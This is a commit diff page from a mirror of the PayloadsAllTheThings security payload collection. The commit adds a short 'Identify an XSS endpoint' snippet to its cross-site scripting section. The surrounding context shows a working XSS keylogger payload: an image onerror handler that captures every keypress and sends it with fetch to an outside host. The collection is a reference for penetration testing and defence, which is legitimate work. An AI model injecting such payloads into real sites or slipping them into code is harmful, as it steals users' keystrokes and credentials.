mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 06:53:04 -08:00
File inclusion - more intruders
This commit is contained in:
@@ -23,6 +23,11 @@ Keylogger for XSS
|
||||
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
|
||||
```
|
||||
|
||||
## Identify an XSS endpoint
|
||||
```
|
||||
<script>debugger;</script>
|
||||
```
|
||||
|
||||
## XSS in HTML/Applications
|
||||
XSS Basic
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user